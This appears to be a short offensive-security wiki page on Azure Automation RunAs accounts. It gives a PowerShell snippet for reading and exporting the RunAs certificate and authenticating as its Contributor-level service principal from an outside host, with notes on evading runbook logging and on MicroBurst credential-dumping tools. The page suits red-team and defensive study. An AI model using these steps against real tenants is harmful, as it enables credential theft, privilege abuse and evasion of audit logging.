RunAs account

A legacy Automation RunAs account is a service principal with a certificate stored in the account, usually granted Contributor on the subscription. Exporting the certificate from inside a runbook lets you authenticate as that service principal from anywhere, outside the Automation sandbox and outside the account's logging.

Exporting the RunAs certificate#

powershell
# inside a runbook, dump the RunAs connection certificate
$conn = Get-AutomationConnection -Name 'AzureRunAsConnection'
$cert = Get-AutomationCertificate -Name 'AzureRunAsCertificate'
# export the PFX bytes and exfiltrate; then authenticate from your host:
Connect-AzAccount -ServicePrincipal -Tenant $conn.TenantId `
  -ApplicationId $conn.ApplicationId -CertificateThumbprint $conn.CertificateThumbprint

Exploitation notes#

  • RunAs accounts are deprecated in favor of managed identities but remain in many tenants; where present, the service principal is typically Contributor and its certificate is long-lived.
  • Authenticating with the exported certificate happens off the Automation platform, so it avoids the runbook-job logging entirely.
  • MicroBurst Get-AzRunAsCertificate automates the export.

Tools#

  • Az PowerShell (Get-AutomationCertificate, Connect-AzAccount -ServicePrincipal).
  • MicroBurst (Get-AzRunAsCertificate, Get-AzPasswords).

References#

Cookie Consent

We use cookies to enhance your experience. Learn more